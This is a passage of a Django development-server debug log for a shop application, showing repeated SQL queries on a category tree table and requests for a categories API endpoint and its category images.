"shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:30:25,447 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:30:25] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:30:25] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [07/Dec/2019 13:30:25] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [07/Dec/2019 13:30:25] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [07/Dec/2019 13:30:26] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [07/Dec/2019 13:30:26] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [07/Dec/2019 13:30:26] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 DEBUG 2019-12-07 13:30:26,772 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:30:26,780 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:30:26,784 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:30:26,788 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:30:26,792 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:30:26,795 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:30:26,799 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:30:26,803 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:30:26,807 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:30:26,811 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:30:26,815 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:30:26] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:30:27] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [07/Dec/2019 13:30:27] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [07/Dec/2019 13:30:27] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [07/Dec/2019 13:30:27] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [07/Dec/2019 13:30:27] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [07/Dec/2019 13:30:27] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 DEBUG 2019-12-07 13:30:27,894 utils 32196 139885028853504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:30:27,902 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:30:27,906 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:30:27,910 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:30:27,914 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:30:27,918 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:30:27,922 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:30:27,926 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:30:27,930 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:30:27,935 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:30:27,939 utils 32196 139885028853504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:30:27] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:30:28] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [07/Dec/2019 13:30:28] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [07/Dec/2019 13:30:28] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [07/Dec/2019 13:30:28] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [07/Dec/2019 13:30:28] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [07/Dec/2019 13:30:28] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-07 13:31:47,488 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:31:47,493 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:31:47,496 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:31:47,499 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:31:47,501 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:31:47,504 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:31:47,506 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:31:47,509 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:31:47,511 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:31:47,514 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:31:47,517 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:31:47] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:31:48] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [07/Dec/2019 13:31:48] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 DEBUG 2019-12-07 13:32:26,880 utils 32196 139885018363648 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:32:26,890 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:32:26,895 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:32:26,899 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:32:26,903 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:32:26,907 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:32:26,911 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:32:26,915 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:32:26,919 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:32:26,923 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:32:26,927 utils 32196 139885018363648 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:32:26] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:32:27] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [07/Dec/2019 13:32:27] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [07/Dec/2019 13:32:27] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [07/Dec/2019 13:32:27] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [07/Dec/2019 13:32:27] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [07/Dec/2019 13:32:27] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [07/Dec/2019 13:32:27] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [07/Dec/2019 13:32:27] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 DEBUG 2019-12-07 13:33:46,281 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:33:46,288 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:33:46,292 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:33:46,296 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:33:46,300 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:33:46,304 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:33:46,308 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 13:33:46,312 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 13:33:46,315 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 13:33:46,319 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 13:33:46,323 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 13:33:46] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 13:33:46] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [07/Dec/2019 13:33:46] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 DEBUG 2019-12-07 13:36:31,879 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:36:31,887 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 13:36:31,892 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 13:36:31,896 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 13:36:31,900 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 13:36:31,903 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 13:36:31,907 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 